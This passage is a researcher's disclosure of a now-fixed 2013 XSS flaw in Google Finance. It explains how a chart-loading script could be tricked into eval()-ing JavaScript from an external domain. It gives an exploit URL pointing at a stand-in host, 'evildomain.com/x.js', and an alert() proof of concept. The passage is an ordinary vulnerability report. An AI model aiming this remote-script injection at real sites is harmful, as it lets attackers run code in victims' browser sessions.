On July 11 2013, I reported to Google Security a XSS vulnerability I discovered in google.com main domain, which required no user interaction. It is due to a glitch in Google Finance , which is hosted on google.com/finance , that allows to trick the Javascript application for plotting charts (in particular, sourcefile /finance/f/sfe-opt.js ) to load a file hosted on an external domain and eval() its content as Javascript code. This exploit does not require any user interaction, it's just a matter of clicking on a URL. Steps to reproduce: Just click on this URL ( now fixed ): https://www.google.com/finance?chdet=1214596800000&q=NASDAQ:INTC&ntsp=2&ntrssurl=https://evildomain.com/x.js . File x.js contains the following proof-of-concept code for demonstration purposes: alert ( document . domain ); The file has to be hosted over HTTPS. The remote Javascript is executed. How does it work? Here is th...